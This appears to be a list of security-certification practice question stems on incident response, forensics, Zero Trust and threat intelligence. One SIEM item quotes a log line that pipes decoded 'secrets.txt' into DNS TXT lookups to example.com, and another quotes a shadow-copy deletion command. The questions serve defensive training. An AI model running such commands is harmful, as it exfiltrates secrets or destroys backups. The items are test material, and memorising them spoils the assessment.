All practice questions
2232 questions
During an active incident investigation, a security analyst confirms that an employee's workstation is currently communicating with an external command-and-control (C2) server following a malware infection. According to standard incident response lifecycle guidelines, which of the following actions should the analyst take FIRST?
A digital forensics responder is preparing to collect evidence from a powered-on target workstation. Place the following memory and storage components in the correct sequence according to the standard Order of Volatility, starting from the MOST volatile to the LEAST volatile.
Drag items to arrange them in the correct order
During a multi-vector attack on a hybrid enterprise infrastructure, a security operations team identifies active data exfiltration using a compromised cloud service account API key, alongside automated ransomware scripts terminating database processes on internal servers. To effectively mitigate damage and recover services according to standard incident response frameworks, what is the correct chronological sequence of steps the response team must execute?
Drag items to arrange them in the correct order
During off-hours monitoring, a Security Operations Center (SOC) analyst receives an automated alert indicating that a newly created cloud IAM access key assigned to a staging service account is actively issuing bulk API requests to download objects from a production database backup S3 bucket to an unrecognized external IP address. After verifying that the API calls originate from unauthorized external sources and represent active data exfiltration, which of the following actions should the analyst take FIRST according to standard incident response playbooks?
An incident response team discovers a server on the enterprise network actively communicating with a known malicious command-and-control server following a ransomware infection. According to standard incident response playbooks for the containment phase, which of the following actions should the analyst perform immediately? (Select TWO.)
Select all that apply
A security analyst monitoring a SOC console receives a high-severity alert from an Endpoint Detection and Response (EDR) agent on an enterprise workstation. The alert details rapid unauthorized file encryption and concurrent attempts at internal lateral movement. Which of the following containment actions should the analyst execute FIRST directly within the EDR console to minimize risk to the enterprise?
A SOC analyst is reviewing correlated telemetry in a SIEM console following an automated high-severity alert:
[SIEM Alert - Event ID: ALRT-2026-9104]
Rule Name: High-Frequency Outbound Encoded DNS Lookups
Telemetry Digest:
- Timestamp: 2026-07-27T10:14:02Z | SrcIP: 172.16.42.50 | DstIP: 8.8.8.8 | Proto: UDP/53 | Query: a3f9b1c2e4d.data.example-cdn.net | QueryType: TXT | Length: 240 bytes
- Timestamp: 2026-07-27T10:14:03Z | SrcIP: 172.16.42.50 | DstIP: 8.8.8.8 | Proto: UDP/53 | Query: e8d4c1f7a9b.data.example-cdn.net | QueryType: TXT | Length: 244 bytes
- Timestamp: 2026-07-27T10:14:04Z | SrcIP: 172.16.42.50 | DstIP: 8.8.8.8 | Proto: UDP/53 | Query: f9b2e0a1c3d.data.example-cdn.net | QueryType: TXT | Length: 238 bytes
(1,420 similar requests recorded within a 3-minute window)
Host Firewall Logs:
2026-07-27T10:13:58Z ALLOW UDP 172.16.42.50:53124 -> 8.8.8.8:53 (Bypassing internal DNS resolver 172.16.0.2)
Based on the log telemetry, which of the following security events is occurring, and which containment action should be implemented first?
A security analyst reviews Wireless Intrusion Detection System (WIDS) logs after users report sudden drops in wireless network connectivity followed by requests to re-enter network credentials. The logs show a rapid burst of IEEE 802.11 broadcast deauthentication frames sent from MAC address 00:11:22:33:44:55, followed immediately by client devices associating with a nearby access point displaying MAC address 00:11:22:33:44:99 that advertises the exact same SSID. Which of the following attack types is most consistent with these technical indicators?
A municipal transit authority is modernizing its distributed traffic management system and fleet maintenance stations to align with Zero Trust Architecture (ZTA) principles. Which of the following architectural decisions directly fulfill core Zero Trust tenets? (Select TWO.)
Select all that apply
A financial services organization is designing a high-throughput database storage system that requires transparent, hardware-level data encryption at rest without burdening the host database server CPUs. Additionally, organizational compliance mandates that encryption keys must be generated and lifecycle-managed by a centralized external key appliance. Which of the following storage security solutions best fulfills these requirements?
An incident response team is conducting a digital forensics investigation on a compromised virtual database server hosting sensitive records. To ensure evidence admissibility in legal proceedings and maintain proper forensic procedure, the responders must handle volatile data and chain of custody documentation correctly. Which of the following procedures should the incident responders execute to meet these requirements? (Select TWO.)
Select all that apply
A security team is defining an automated containment and investigation workflow for suspicious host behavior flagged by an Endpoint Detection and Response (EDR) agent. Order the steps in the correct chronological sequence from initial detection through remediation.
Drag items to arrange them in the correct order
A Security Operations Center (SOC) analyst is investigating suspicious network activity on an internal Linux host (192.168.1.45) by correlating local audit logs with internal DNS resolver logs:
[DNS Resolver Logs]
2026-07-27T14:02:11.104Z client 192.168.1.45 query: a3V4b25lbGluZQ.c2VjdXJpdHl0ZXN0.example.com IN TXT
2026-07-27T14:02:11.312Z client 192.168.1.45 query: dGhlcXVpY2ticm93bmZveA.c2VjdXJpdHl0ZXN0.example.com IN TXT
[Linux Audit Log (/var/log/audit/audit.log)]
type=SYSCALL msg=audit(1785160920.412:982): arch=c000003e syscall=59 success=yes exe="/usr/bin/bash"
type=EXECVE msg=audit(1785160920.412:982): argc=3 a0="/usr/bin/bash" a1="-c" a2="base64 -d secrets.txt | nslookup -type=TXT - example.com"
Based on the log telemetry provided, which of the following statements accurately characterize the security incident occurring on the endpoint? (Select TWO.)
Select all that apply
A chief information security officer is preparing an executive risk assessment for the board of directors regarding potential cyber risks associated with an upcoming international expansion. The assessment must focus on high-level adversary motivations, geopolitical threat trends, and overall business risk impact rather than low-level technical indicators such as file hashes or malicious IP addresses. Which classification of threat intelligence is most appropriate for this report?
During a complex security incident investigation involving an enterprise storage array hosting virtualized database servers, a forensic investigator must extract and preserve digital evidence for upcoming judicial proceedings. The storage array utilizes volatile write caches mirrored asynchronously across active controller nodes. To preserve evidence integrity and establish an unassailable chain of custody during acquisition, which of the following procedures should the investigator perform first?
A security administrator is reviewing hardware resilience controls for an enterprise web application server host. The server host currently features dual redundant power supplies, hot-swappable cooling fans, and a RAID 10 storage array to prevent single points of hardware failure. However, a recent risk assessment highlighted that if the single physical host chassis or motherboard experiences a hardware fault, the application will become unavailable. Which of the following high-availability solutions should the administrator implement to automatically fail over virtualized workloads to a healthy physical host upon host hardware failure?
An incident response analyst seizes a powered-on smartphone that is suspected of being used in an active data exfiltration incident. To prevent remote wipe commands or external data modification over cellular or Wi-Fi networks while transporting the physical evidence to the forensics laboratory, which of the following is the most appropriate action to take?
A Security Operations Center (SOC) analyst confirms an active security incident involving a critical Linux database server hosting sensitive customer records. An external attacker has established an interactive reverse shell via a web application vulnerability, and an automated script on the system is actively staging database tables into an encrypted archive for exfiltration. The incident response playbook requires halting exfiltration immediately while preserving volatile system memory for subsequent forensic analysis. Which of the following actions should the analyst take FIRST?
During an investigation into a ransomware propagation attempt on a critical enterprise server, a security analyst reviews telemetry captured by an Endpoint Detection and Response (EDR) agent. The EDR telemetry log reveals that an authenticated enterprise database daemon spawned a command-line interpreter, which subsequently executed `vssadmin.exe delete shadows /all /quiet`. The EDR agent's automated response policy immediately terminated the command interpreter and its child sub-processes and placed the endpoint into network isolation, but deliberately allowed the primary database daemon process to continue executing. Which of the following best explains the architectural rationale behind the EDR agent targeting only the child process tree during remediation?
A security analyst is documenting the collection, movement, and storage of a physical storage drive seized during an incident response investigation. Which of the following best describes the primary purpose of maintaining a formal chain of custody log throughout this process?